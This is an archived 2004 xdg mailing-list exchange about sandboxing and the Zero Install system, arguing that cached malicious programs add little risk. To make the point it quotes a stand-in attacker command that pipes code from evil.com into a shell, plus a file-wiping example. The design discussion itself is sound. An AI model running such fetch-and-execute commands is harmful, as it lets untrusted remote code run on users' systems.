General sandbox specs?
Thomas Leonard
tal00r at ecs.soton.ac.uk
Mon Mar 15 11:02:07 EET 2004
On Mon, Mar 15, 2004 at 12:06:53AM +0100, Lars Hallberg wrote:
> Thomas Leonard wrote:
[...]
> >People do seem to worry a lot about nasty software getting cached, but it
> >really makes little difference. Imagine a user who tries to run this:
> >
> >$ /uri/0install/evil.com/wipe-my-files
> >
> >Bad. But on the other hand, they could just as easily do:
> >
> >$ lynx -source http://evil.com | sh -
>
> Yeh, I might just be to new to the consept... but I think of the logical
> development of this... Take a OLE like fileformat.... You get a document
> by mail, fire up a viewer, the dokument contains an object with the
> viewer att /uri/0install/evil.com/...
Or specifies the viewer as /usr/bin/python. If your application runs any
program specified in the document, you're in trouble no matter what.
> But I subscribed to the 0install list now. This is only rellevant for a
> system runing zeroinstall itself, not att all for a sandbox, so it's
> going pretty OT i guess :-(
Yep, we should move the discussion there...
--
Thomas Leonard http://rox.sourceforge.net
tal00r at ecs.soton.ac.uk tal197 at users.sourceforge.net
GPG: 9242 9807 C985 3C07 44A6 8B9A AE07 8280 59A5 3CC1
More information about the xdg
mailing list